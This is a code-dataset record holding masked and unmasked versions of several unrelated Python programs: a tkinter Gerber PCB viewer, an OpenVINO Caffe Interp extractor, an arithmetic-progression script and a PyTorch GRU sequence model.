cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i',\n str(cp_y - radius) + 'i', str(cp_x + radius) +\n 'i', str(cp_y + radius) + 'i', outline='black',\n width=self.current_aperture)\n else:\n cp_x = float(self.start_x) + 
float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.\n start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) -\n cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i',\n str(cp_y + radius) + 'i', str(cp_x - radius) +\n 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n",
"step-5": "import tkinter as tk\nfrom pickplace import PickPlace\nimport sys\nimport math\nfrom tkinter import messagebox\nimport os\n\nDEBUG = False\n\n\nclass GerberCanvas:\n\n file_gto = False\n file_gtp = False\n units = 0\n units_string = ('i', 'm')\n\n \"\"\"\n my canvas\n \"\"\"\n def __init__(self, frame):\n self.x_format = ''\n self.y_format = ''\n self.units = ''\n self.quadrant_mode = 0\n self.file_commands = ''\n self.file_gtp_commands = ''\n self.gerber_file_name = ''\n self.AD_commands = {} # dict to hold aperture commands\n self.current_aperture = ''\n self.x = '0'\n self.y = '0'\n self.i = '0'\n self.j = '0'\n self.last_x = ''\n self.last_y = ''\n self.start_x = ''\n self.start_y = ''\n self.direction = 0\n self.graphics_mode = 0\n self.scaled = False\n self.bounding_box_size = ()\n self._canvas_frame = frame\n self.create_canvas()\n\n def create_canvas(self):\n self.my_canvas = tk.Canvas(self._canvas_frame, bg='white', bd='1')\n self.my_canvas.pack(expand=True, fill='both')\n if sys.platform == 'linux':\n self.my_canvas.bind('<Button-4>', self.__scale_image_up)\n self.my_canvas.bind('<Button-5>', self.__scale_image_down)\n else:\n self.my_canvas.bind('<MouseWheel>', self.__scale_image)\n\n # fixme fix the scrollbars so that they work correctly\n self.y_scrollbar = tk.Scrollbar(self.my_canvas, command=self.my_canvas.yview)\n self.y_scrollbar.pack(expand=True, fill='y', anchor='e')\n\n self.x_scrollbar = tk.Scrollbar(self.my_canvas, orient=tk.HORIZONTAL, command=self.my_canvas.xview)\n self.x_scrollbar.pack(fill='x', anchor='s')\n\n # Set this only if using in Linux\n if sys.platform == 'linux':\n self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)\n\n self.__part_selected = 0\n\n def load_gerber(self, path, file):\n \"\"\"load gerber file\n :param path: path to the file\n :param file: file name to use\n \"\"\"\n\n try:\n # file_path = askopenfilename(title='Open Top Silk Screen File', filetypes=[('GTO 
files', '*.GTO')],\n # initialdir='')\n\n all_ids = self.my_canvas.find_all()\n # delete the current image if one exist.\n if all_ids:\n try:\n for item in all_ids:\n print(item)\n self.my_canvas.delete(item)\n except tk.TclError:\n messagebox.showerror('Error', tk.TclError)\n\n if path:\n self.file_gto = True\n try:\n with open(os.path.join(path, file), 'r') as gerber_file:\n self.file_commands = gerber_file.read().splitlines()\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n # self._parse_file(gerber_file.read())\n self.__parse_file(self.file_commands)\n self.my_canvas.create_oval('0i', '0i', '.1i', '.1i', outline='red')\n self.gerber_file_name = file\n self.scaled = False\n # self.bounding_box_size = self.my_canvas.bbox('all')\n if DEBUG:\n print('Scroll region is : ', self.bounding_box_size)\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTO')\n finally:\n self.file_gto = False\n # load top pads into image\n self.load_gerber_gtp(os.path.join(path, file))\n self.my_canvas.config(scrollregion=self.my_canvas.bbox('all'))\n # self.my_canvas.configure(xscrollcommand=self.x_scrollbar.set, yscrollcommand=self.y_scrollbar.set)\n\n def load_gerber_gtp(self, file_path):\n self.file_gtp = True\n try:\n print(file_path)\n new_file = 'c' + file_path[1:len(file_path)-3]+'GTP'\n print('final name =', new_file)\n if file_path:\n try:\n with open(new_file, 'r') as gerber_file:\n self.file_gtp_commands = gerber_file.read().splitlines()\n except TypeError:\n messagebox.showerror('Type Error', 'Invalid File Type')\n self.__parse_file(self.file_gtp_commands)\n # self.scaled = False\n except IOError:\n messagebox.showerror('File Error', 'File did not open, GTP')\n\n def __parse_file(self, commands):\n if DEBUG:\n print(self.file_commands)\n temp_list = commands\n for item in temp_list:\n if DEBUG:\n print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n\n if '%MO' in item:\n self.units = 
item[3:5]\n if 'IN' in item:\n GerberCanvas.units = 0\n if 'MM' in item:\n GerberCanvas.units = 1\n # print('units is ', self.units)\n\n if 'G01' in item:\n self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear\n\n if 'G03' in item:\n self.direction = 270 # CounterClockWise\n\n if 'G02' in item:\n self.direction = 90 # ClockWise\n\n if 'G74' in item:\n self.quadrant_mode = 0 # single Quadrant mode\n\n if 'G75' in item:\n self.quadrant_mode = 1 # Multi quadrant mode\n\n if '%AD' in item: # define the aperture\n name = item[3:item.find(',')-1]\n if DEBUG:\n print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start-1:stop]\n if DEBUG:\n print(value)\n self.AD_commands[name] = value\n\n if item[0:1] == 'D': # set the current aperture\n item = item[0:item.find('*')]\n if DEBUG:\n print('I found a ', item)\n for key, value in self.AD_commands.items():\n self.current_ad_command = key\n if item in key:\n if 'R,' in value: # for a rectangle\n print(value)\n x, y = self.__get_rectangle_size(value)\n self.rect_x = x\n self.rect_y = y\n print('Half of x is: ', float(self.rect_x)/2)\n # todo send this to a function to get size\n elif 'C,' in value: # for a circle\n print(value)\n self.current_aperture = self.__get_circle_diameter(value)\n elif 'O,' in value: # for a ob-round\n pass\n elif 'P,' in value: # for a polygon\n pass\n elif 'TARGET' in value:\n pass\n elif 'THERMAL' in value:\n pass\n\n # This is the Flash command. 
Create a flash of the object.\n if 'D03' in item:\n if DEBUG:\n print('current key is = ', self.current_ad_command)\n print(self.AD_commands[self.current_ad_command])\n if 'R,' in self.AD_commands[self.current_ad_command]:\n if DEBUG:\n print('draw a rectangle')\n x0 = float(self.start_x) - float(self.rect_x) / 2\n y0 = float(self.start_y) + float(self.rect_y) / 2\n x1 = float(self.start_x) + float(self.rect_x) / 2\n y1 = float(self.start_y) - float(self.rect_y) / 2\n self.my_canvas.create_rectangle(str(x0) + GerberCanvas.units_string[GerberCanvas.units],\n str(y0) + GerberCanvas.units_string[GerberCanvas.units],\n str(x1) + GerberCanvas.units_string[GerberCanvas.units],\n str(y1) + GerberCanvas.units_string[GerberCanvas.units],\n outline='white', fill='black')\n if 'C,' in self.AD_commands[self.current_ad_command]:\n print('draw a circle')\n\n # the D02 command is the move to command.\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n # if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line\n if ('D01' in item) and (('I' not in item) and ('J' not in item)):\n if self.file_gto: # draw a line\n self.__get_numbers(item)\n if DEBUG:\n print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)\n self.my_canvas.create_line(self.start_x+'i', self.start_y+'i', self.x+'i', self.y+'i',\n width=self.current_aperture+'i')\n self.start_x = self.x\n self.start_y = self.y\n\n # this Draws a circle.\n if 'D01' and 'I' and 'J' in item: # draw a circle/arc\n if self.file_gto:\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item) # test\n\n if self.quadrant_mode: # This draws circles or arcs\n if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles\n cp_x = float(self.start_x) + float(self.i)\n cp_y = 
float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n try:\n self.my_canvas.create_oval(str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],\n outline='black', width=self.current_aperture)\n except UnboundLocalError():\n messagebox.showwarning('Warning', 'Something went wrong.')\n break\n else: # This draws arcs\n # self.evaluate_arc_command(item)\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n\n if DEBUG:\n print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n else:\n radius = 0.0\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))\n # radius = math.degrees(self.__get_extent(radius))\n try:\n self.my_canvas.create_arc(str(cp_x + radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y + radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_x - radius) + GerberCanvas.units_string[GerberCanvas.units],\n str(cp_y - radius) + GerberCanvas.units_string[GerberCanvas.units],\n style=tk.ARC, width=self.current_aperture, start=start_angle,\n extent=end_angle-start_angle, outline='black')\n # self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,\n # outline='purple')\n except UnboundLocalError():\n messagebox.showwarning('Warning', 'Something went wrong.')\n\n @staticmethod\n def __get_circle_diameter(value):\n return value[3:len(value)]\n\n @staticmethod\n def __get_rectangle_size(value):\n print(value)\n find_x = value.find('X'[0:len(value)])\n width = 
value[2:find_x]\n length = value[find_x+1:len(value)]\n print(width, length)\n return width, length\n\n def __get_extent(self, radius):\n distance = self.__distance(float(self.start_x), float(self.start_y), float(self.x), float(self.y))\n if DEBUG:\n print('distance = ', distance)\n number = (1-((distance**2) / (2*(radius**2))))\n result = number - int(number)\n return math.acos(result)\n\n @staticmethod\n def __distance(start_x, start_y, end_x, end_y):\n \"\"\"calculate distance between two points\n :param start_x\n :param start_y\n :param end_x\n :param end_y\n \"\"\"\n distance = math.sqrt((start_x - end_x) ** 2 + (start_y - end_y) ** 2)\n return distance\n\n def __set_direction(self):\n if self.x == self.start_x:\n if self.y < self.start_y:\n self.direction = 90\n else:\n self.direction = 270\n if self.y == self.start_y:\n if self.x < self.start_x:\n self.direction = 0\n else:\n self.direction = 180\n\n def __get_numbers(self, item):\n found = 0\n\n if 'I' in item and 'J' in item and found == 0:\n found = 1\n i_start = item.find('I')\n j_start = item.find('J')\n d_start = item.find('D')\n\n i_temp = item[i_start+1:j_start]\n j_temp = item[j_start+1:d_start]\n j_temp = str(int(j_temp) * -1)\n\n self.i = self.__format_number(i_temp)\n self.j = self.__format_number(j_temp)\n\n if 'X' and 'Y' in item:\n found = 0\n\n if 'X' in item and 'Y' in item and found == 0:\n found = 1\n x_start = item.find('X')\n y_start = item.find('Y')\n d_start = item.find('D')\n\n x_temp = item[x_start+1:y_start]\n y_temp = item[y_start+1:d_start]\n if ('I' or 'J') in y_temp:\n for i in range(1, len(y_temp)):\n if y_temp[i] == 'I':\n y_temp = y_temp[0:i]\n break\n y_temp = str(int(y_temp) * -1)\n\n self.x = self.__format_number(x_temp)\n self.y = self.__format_number(y_temp)\n\n if 'X' in item and found == 0:\n found = 1\n x_start = item.find('X')\n d_start = item.find('D')\n\n x_temp = item[x_start+1:d_start]\n\n self.x = self.__format_number(x_temp)\n\n if 'Y' in item and found == 0:\n 
found = 1\n y_start = item.find('Y')\n d_start = item.find('D')\n\n y_temp = item[y_start + 1:d_start]\n # flip my y axis\n y_temp = str(int(y_temp) * -1)\n\n self.y = self.__format_number(y_temp)\n\n def __format_number(self, number):\n how_long = len(number)\n\n if how_long <= int(self.x_format[1]):\n if '-' in number:\n temp = number[1:len(number)]\n return '-.' + temp.zfill(int(self.x_format[1]))\n else:\n return '.' + number.zfill(int(self.x_format[1]))\n elif how_long > int(self.x_format[1]):\n last = number[-5:len(number)]\n first = number[0:len(number)-5]\n if '-' in number:\n return first + '.' + last\n # return '-' + first + '.' + last\n else:\n return first + '.' + last\n\n def high_lite_part(self, x, y, layer):\n x1 = self.__format_pnp(x)\n y1 = self.__format_pnp(y) * -1\n last_x = float(x1) + .1\n last_y = float(y1) + .1\n if layer == 'TopLayer':\n color = 'red'\n else:\n color = 'blue'\n self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i', str(last_y) + 'i',\n outline=color, fill=color)\n # elif layer == 'BottomLayer':\n # self.__part_selected = self.my_canvas.create_oval(str(x1) + 'i', str(y1) + 'i', str(last_x) + 'i',\n # str(last_y) + 'i', outline='blue', fill='blue')\n\n def delete_current_highlight(self):\n if self.__part_selected:\n self.my_canvas.delete(self.__part_selected)\n\n def __scale_image_up(self, event=None):\n self.scale_factor = 1\n self.scale_factor += .1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image_down(self, event=None):\n self.scale_factor = 1\n self.scale_factor -= .1\n self.my_canvas.scale('all', 0, 0, self.scale_factor, self.scale_factor)\n if PickPlace.is_file_loaded:\n PickPlace.adjust_pic_n_place(self.scale_factor)\n self.scaled = True\n\n def __scale_image(self, event=None):\n if event.delta >= 120:\n self.__scale_image_up()\n elif event.delta <= -120:\n 
self.__scale_image_down()\n self.scaled = True\n\n @staticmethod\n def __format_pnp(number):\n move1 = float(number) / 10\n move2 = move1 / 10\n final = move2 / 10\n return final\n\n def __parse_file_gtp(self):\n # print(self.file_commands)\n temp_list = self.file_commands\n for item in temp_list:\n # print(item)\n if '%FSLA' in item:\n self.x_format = item[6:8]\n self.y_format = item[9:11]\n if '%MO' in item:\n self.units = item[3:5]\n if 'IN' in item:\n self.__inch = 1\n self.__mm = 0\n if 'MM' in item:\n self.__inch = 0\n self.__mm = 1\n # print('units is ', self.units)\n if 'G01' in item:\n self.graphics_mode = 1 # sets Interpolation mode graphics state parameter to linear\n if 'G03' in item:\n self.direction = 270 # CounterClockWise\n if 'G02' in item:\n self.direction = 90 # ClockWise\n if 'G74' in item:\n self.quadrant_mode = 0 # single Quadrant mode\n if 'G75' in item:\n self.quadrant_mode = 1 # Multi quadrant mode\n if '%AD' in item: # diameter of the circle\n name = item[3:item.find(',') - 1]\n # print(name)\n start = item.find(',')\n stop = item.find('*', start)\n value = item[start - 1:stop]\n # print(value)\n self.AD_commands[name] = value[2:len(value)]\n if item[0:1] == 'D':\n item = item[0:item.find('*')]\n # print('I found a ', item)\n for key, value in self.AD_commands.items():\n if item in key:\n self.current_aperture = value\n if 'D02' in item:\n self.__get_numbers(item)\n if 'X' in item and 'Y' not in item:\n self.start_x = self.x\n if 'Y' in item and 'X' not in item:\n self.start_y = self.y\n if 'X' in item and 'Y' in item:\n self.start_x = self.x\n self.start_y = self.y\n if ('D01' in item) and (('I' not in item) and ('J' not in item)): # draw a line\n self.__get_numbers(item)\n # print(self.start_x, ',', self.start_y, ',', self.x, ',', self.y)\n self.my_canvas.create_line(self.start_x + 'i', self.start_y + 'i', self.x + 'i', self.y + 'i',\n width=self.current_aperture + 'i')\n self.start_x = self.x\n self.start_y = self.y\n # this Draws a 
circle.\n if 'D01' and 'I' and 'J' in item: # draw a circle\n self.start_x = self.x\n self.start_y = self.y\n self.__get_numbers(item)\n\n if self.quadrant_mode: # This draws circles or arcs\n if (self.start_x == self.x) and (self.start_y == self.y): # This draws circles\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n if self.i != 0:\n radius = float(self.i)\n elif self.j != 0:\n radius = float(self.j)\n self.my_canvas.create_oval(str(cp_x - radius) + 'i', str(cp_y - radius) + 'i',\n str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',\n outline='black', width=self.current_aperture)\n\n else: # This draws arcs\n cp_x = float(self.start_x) + float(self.i)\n cp_y = float(self.start_y) + float(self.j)\n # print(str(cp_x) + ' ' + str(cp_y))\n if float(self.i) > 0:\n radius = float(self.i)\n elif float(self.j) > 0:\n radius = float(self.j)\n self.__set_direction()\n start_angle = math.degrees(math.atan2(float(self.start_y) - cp_y, float(self.start_x) - cp_x))\n end_angle = math.degrees(math.atan2(float(self.y) - cp_y, float(self.x) - cp_x))\n ext = math.degrees(self.__get_extent(radius))\n self.my_canvas.create_arc(str(cp_x + radius) + 'i', str(cp_y + radius) + 'i',\n str(cp_x - radius) + 'i', str(cp_y - radius) + 'i', style=tk.ARC,\n width=self.current_aperture, start=start_angle,\n extent=end_angle - start_angle, outline='black')\n # self.my_canvas.create_arc('0', '0', '100', '100', style='arc', start=90, extent=180,\n # outline='purple')\n\n",
"step-ids": [
18,
19,
20,
23,
25
]
}
|
[
18,
19,
20,
23,
25
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpFrontExtractor(FrontExtractorOp):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def extract(cls, node):
proto_layer = node.pb
param = proto_layer.interp_param
update_attrs = {'height': param.height, 'width': param.width,
'zoom_factor': param.zoom_factor, 'shrink_factor': param.
shrink_factor}
mapping_rule = merge_attrs(param, update_attrs)
mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':
int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':
param.pad_end, 'align_corners': 1})
Interpolate.update_node_stat(node, mapping_rule)
return cls.enabled
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class InterpFrontExtractor(FrontExtractorOp):
    """Convert a Caffe ``Interp`` layer into an internal Interpolate node."""

    op = 'Interp'
    enabled = True

    @classmethod
    def extract(cls, node):
        """Populate ``node`` with Interpolate attributes read from its proto.

        :param node: graph node whose ``pb`` field is the parsed Caffe layer.
        :return: ``cls.enabled`` (True) to signal successful extraction.
        """
        param = node.pb.interp_param

        # Sizing attributes lifted verbatim from the InterpParameter message.
        proto_attrs = {
            'height': param.height,
            'width': param.width,
            'zoom_factor': param.zoom_factor,
            'shrink_factor': param.shrink_factor,
        }
        attrs = merge_attrs(param, proto_attrs)

        # Fixed attributes for the Caffe flavour of Interp: linear mode over
        # axes 2 and 3, proto paddings, align_corners enabled.
        attrs.update({
            'fw': 'caffe',
            'mode': 'linear',
            'axes': int64_array([2, 3]),
            'pads_begin': param.pad_beg,
            'pads_end': param.pad_end,
            'align_corners': 1,
        })

        Interpolate.update_node_stat(node, attrs)
        return cls.enabled
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from extensions.ops.interpolate import Interpolate
from mo.front.caffe.collect_attributes import merge_attrs
from mo.front.common.partial_infer.utils import int64_array
from mo.front.extractor import FrontExtractorOp
class InterpFrontExtractor(FrontExtractorOp):
    """Front extractor mapping a Caffe ``Interp`` layer onto Interpolate."""
    # Caffe layer type this extractor handles (presumably used as the
    # registry dispatch key by FrontExtractorOp — confirm in the base class).
    op = 'Interp'
    # Marks the extractor as active so the framework picks it up.
    enabled = True
    @classmethod
    def extract(cls, node):
        """Fill ``node`` with Interpolate attributes taken from its proto.

        :param node: graph node whose ``pb`` field holds the parsed Caffe
            protobuf layer message.
        :return: ``cls.enabled`` (True), signalling successful extraction.
        """
        proto_layer = node.pb
        param = proto_layer.interp_param
        # Sizing attributes copied from InterpParameter; merge_attrs is
        # expected to keep only the ones meaningful for this layer — TODO
        # confirm against its implementation.
        update_attrs = {'height': param.height, 'width': param.width,
            'zoom_factor': param.zoom_factor, 'shrink_factor': param.
            shrink_factor}
        mapping_rule = merge_attrs(param, update_attrs)
        # Fixed semantics for the Caffe flavour: linear interpolation over
        # axes 2 and 3, proto paddings, align_corners enabled.
        mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':
            int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':
            param.pad_end, 'align_corners': 1})
        Interpolate.update_node_stat(node, mapping_rule)
        return cls.enabled
<|reserved_special_token_1|>
"""
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from extensions.ops.interpolate import Interpolate
from mo.front.caffe.collect_attributes import merge_attrs
from mo.front.common.partial_infer.utils import int64_array
from mo.front.extractor import FrontExtractorOp
class InterpFrontExtractor(FrontExtractorOp):
    """Translate a Caffe ``Interp`` layer into an Interpolate operation."""

    op = 'Interp'
    enabled = True

    @classmethod
    def extract(cls, node):
        """Derive Interpolate attributes from the layer proto and attach them.

        :param node: graph node wrapping a Caffe ``Interp`` layer; ``node.pb``
            is the parsed protobuf message.
        :return: ``cls.enabled`` (True) on success.
        """
        param = node.pb.interp_param

        # Start from the proto-declared sizing fields; merge_attrs filters
        # them against what the layer actually carries.
        mapping_rule = merge_attrs(param, {
            'height': param.height,
            'width': param.width,
            'zoom_factor': param.zoom_factor,
            'shrink_factor': param.shrink_factor,
        })

        # Constant attributes for the Caffe variant: linear interpolation on
        # axes 2 and 3 with align_corners set, plus the proto paddings.
        mapping_rule['fw'] = 'caffe'
        mapping_rule['mode'] = 'linear'
        mapping_rule['axes'] = int64_array([2, 3])
        mapping_rule['pads_begin'] = param.pad_beg
        mapping_rule['pads_end'] = param.pad_end
        mapping_rule['align_corners'] = 1

        Interpolate.update_node_stat(node, mapping_rule)
        return cls.enabled
|
flexible
|
{
"blob_id": "ce28462621a423c6661c672cf92d7e9c91875cfa",
"index": 8247,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n <mask token>\n <mask token>\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n update_attrs = {'height': param.height, 'width': param.width,\n 'zoom_factor': param.zoom_factor, 'shrink_factor': param.\n shrink_factor}\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':\n int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':\n param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-3": "<mask token>\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n op = 'Interp'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n update_attrs = {'height': param.height, 'width': param.width,\n 'zoom_factor': param.zoom_factor, 'shrink_factor': param.\n shrink_factor}\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':\n int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':\n param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-4": "<mask token>\nfrom extensions.ops.interpolate import Interpolate\nfrom mo.front.caffe.collect_attributes import merge_attrs\nfrom mo.front.common.partial_infer.utils import int64_array\nfrom mo.front.extractor import FrontExtractorOp\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n op = 'Interp'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n update_attrs = {'height': param.height, 'width': param.width,\n 'zoom_factor': param.zoom_factor, 'shrink_factor': param.\n shrink_factor}\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes':\n int64_array([2, 3]), 'pads_begin': param.pad_beg, 'pads_end':\n param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-5": "\"\"\"\n Copyright (C) 2018-2020 Intel Corporation\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom extensions.ops.interpolate import Interpolate\nfrom mo.front.caffe.collect_attributes import merge_attrs\nfrom mo.front.common.partial_infer.utils import int64_array\nfrom mo.front.extractor import FrontExtractorOp\n\n\nclass InterpFrontExtractor(FrontExtractorOp):\n op = 'Interp'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n proto_layer = node.pb\n param = proto_layer.interp_param\n\n update_attrs = {\n 'height': param.height,\n 'width': param.width,\n 'zoom_factor': param.zoom_factor,\n 'shrink_factor': param.shrink_factor,\n }\n\n mapping_rule = merge_attrs(param, update_attrs)\n mapping_rule.update({'fw': 'caffe', 'mode': 'linear', 'axes': int64_array([2, 3]),\n 'pads_begin': param.pad_beg, 'pads_end': param.pad_end, 'align_corners': 1})\n Interpolate.update_node_stat(node, mapping_rule)\n return cls.enabled\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
##Arithmatic Progression
a = int(input ('Enter first number: '))
d = int(input('Enter common difference: '))
n = int(input('Number of term: '))
tn = a
while tn <= a + (n - 1) * d:
print(tn, end=" ")
tn += d
|
normal
|
{
"blob_id": "e748261d1e5fd7921a022afefe5a5bea1fbfc67c",
"index": 9095,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile tn <= a + (n - 1) * d:\n print(tn, end=' ')\n tn += d\n",
"step-3": "a = int(input('Enter first number: '))\nd = int(input('Enter common difference: '))\nn = int(input('Number of term: '))\ntn = a\nwhile tn <= a + (n - 1) * d:\n print(tn, end=' ')\n tn += d\n",
"step-4": "##Arithmatic Progression\r\n\r\na = int(input ('Enter first number: '))\r\nd = int(input('Enter common difference: '))\r\nn = int(input('Number of term: '))\r\n\r\ntn = a\r\n\r\nwhile tn <= a + (n - 1) * d:\r\n print(tn, end=\" \")\r\n tn += d\r\n \r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
arrayMapPath = 'C:\\Python27\\Lib\\site-packages\\ticketpitcher\\data'
tempPath = 'd:\\temp\\'
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 14 22:09:56 2014
@author: duhan
"""
#arrayMapPath = r'/usr/local/lib/python2.7/dist-packages/ticketpitcher/data/3'
arrayMapPath = r'C:\Python27\Lib\site-packages\ticketpitcher\data'
#tempPath = r'/tmp/'
tempPath = 'd:\\temp\\'
|
flexible
|
{
"blob_id": "9627e8a468d3a75787c5a9e01856913fc8beb3c4",
"index": 1868,
"step-1": "<mask token>\n",
"step-2": "<mask token>\narrayMapPath = 'C:\\\\Python27\\\\Lib\\\\site-packages\\\\ticketpitcher\\\\data'\ntempPath = 'd:\\\\temp\\\\'\n",
"step-3": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 14 22:09:56 2014\n\n@author: duhan\n\"\"\"\n#arrayMapPath = r'/usr/local/lib/python2.7/dist-packages/ticketpitcher/data/3'\narrayMapPath = r'C:\\Python27\\Lib\\site-packages\\ticketpitcher\\data'\n#tempPath = r'/tmp/'\ntempPath = 'd:\\\\temp\\\\'\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Model(nn.Module):
<|reserved_special_token_0|>
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
shape[0], encoding_result.shape[1] * encoding_result.shape[2]])
seq_pred = self.decoder(encoding_result)
return seq_pred.squeeze(1)
def _loss_fn(self, seq_pred, target_seq):
return F.mse_loss(seq_pred, target_seq)
<|reserved_special_token_0|>
def infer_batch(self, input_seq, logger):
"""
model inference.
The given data can be in the form of batch or single isinstance
"""
return self.forward(input_seq, None)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Model(nn.Module):
def __init__(self, hidden_size, encoder_layer=2, step=4, is_bidir=False,
**kw):
super(Model, self).__init__()
fc_embedding = []
for i in range(int(math.log(hidden_size, step))):
fc_embedding.append(nn.Linear(int(math.pow(step, i)), int(math.
pow(step, i + 1))))
fc_embedding.append(nn.Linear(int(math.pow(step, int(math.log(
hidden_size, step)))), hidden_size))
self.fc_embedding = nn.Sequential(*fc_embedding)
self.encoder = nn.GRU(hidden_size, hidden_size, encoder_layer,
False, True, bidirectional=is_bidir)
self.decoder = nn.Sequential(nn.Linear(encoder_layer * (int(
is_bidir) + 1) * hidden_size, hidden_size), nn.Linear(
hidden_size, hidden_size // step), nn.Linear(hidden_size //
step, 1))
def forward(self, input_seq, target_seq=None):
input_seq = self.fc_embedding(input_seq.unsqueeze(-1))
_, encoding_result = self.encoder(input_seq)
encoding_result = torch.transpose(encoding_result, 0, 1).contiguous()
encoding_result = torch.reshape(encoding_result, [encoding_result.
